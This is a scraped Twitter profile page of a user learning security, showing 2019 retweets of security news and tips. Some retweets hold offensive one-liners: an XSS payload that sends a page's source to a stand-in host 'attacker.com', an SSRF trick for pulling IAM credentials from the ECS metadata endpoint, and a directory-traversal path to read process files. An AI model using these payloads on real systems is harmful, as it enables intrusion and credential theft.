0ks3iio

@alchu4n

Love programming, love the network, trying to learn rookie safety knowledge And I am Chinese

China
Vrijeme pridruživanja: srpanj 2014.

Tweetovi

Blokirali ste korisnika/cu @alchu4n

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @alchu4n

  1. proslijedio/la je Tweet
    24. stu 2019.
    Poništi
  2. proslijedio/la je Tweet

    Spaced repetition is a great way to remember things 🧠 Turn your notes into flashcards and learn at your own pace 💯📝

    Poništi
  3. proslijedio/la je Tweet
    3. lis 2019.

    If you have an SSRF with file system access on an ECS instance then try extracting /proc/self/environ to get UUID and then try hitting ECS metadata curl http://169.254.170.2/v2/credentials/<UUID> This way you'll extract IAM keys of the attached role

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet

    It seems like everyone shipping Electron or CEF has made the mistake of leaving the debugger enabled at some point. I made a tiny command line application you can use to check. 🐞

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    10. lis 2019.

    A payload that steals source code of the current webpage without triggering browser restrictions, by <svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

    Poništi
  6. proslijedio/la je Tweet

    Fuzzing URI's for sites that have SSO (okta) infront of them can yield some interesting results -

    Poništi
  7. proslijedio/la je Tweet
    4. lis 2019.

    Got a directory traversal? Don't forget to check out /proc/[0-9]*/fd/[0-9]* for more juicy info!

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    6. lis 2019.

    Actively exploited zero-day vulnerability found in Google Pixel, Huawei, Xiaomi, Samsung, and other devices

    Poništi
  9. proslijedio/la je Tweet
    6. lis 2019.
    Poništi
  10. proslijedio/la je Tweet
    6. lis 2019.
    Poništi
  11. proslijedio/la je Tweet
    6. lis 2019.

    [CVE-2019-11184] NetCAT(Network Cache ATtack) Remotely leaking keystrokes from a victim SSH session Intel Xeon E5/E7v2 DDIO Does not require any malicious software Leak the arrival time of the corresponding packet.

    Poništi
  12. proslijedio/la je Tweet
    7. lis 2019.

    A few people had issues figuring out how to use HTTP Request Smuggler, so I've posted step-by-step instructions on how to use it to solve an online lab:

    Poništi
  13. proslijedio/la je Tweet
    5. lis 2019.

    Information Security related Mind Maps:- The full list:-

    Poništi
  14. proslijedio/la je Tweet
    3. lis 2019.

    GIF Image Could Have Hacked Your Android Phone Using WhatsApp CVE-2019-11932 Does not get triggered by sending a mal GIF file to a victim instead it gets executed when the victim itself simply opens the WhatsApp Gallery Picker

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    1. lis 2019.

    「左耳朵耗子发自 」【HTTP的前世今生】 最近 HTTP/3 被 Chrome,Firefox,和 Cloudflare支持,所以想写篇文章,简单地说一下HTTP的前世今生,说一下各个版本的重要特性。(行文仓𠉵,可能错误比较...

    Poništi
  16. proslijedio/la je Tweet
    29. ruj 2019.

    fontchk.dll db6edf104261faad52291b30c19ba148 yesterday submit from korean C2:

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    29. ruj 2019.

    sql tips: you can group by anything

    Poništi
  18. proslijedio/la je Tweet

    Вызвать дьявола? Скучно... Зарядить телефон? Да!

    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    29. ruj 2019.

    PuTTY 0.73 releases: security & bug fix

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·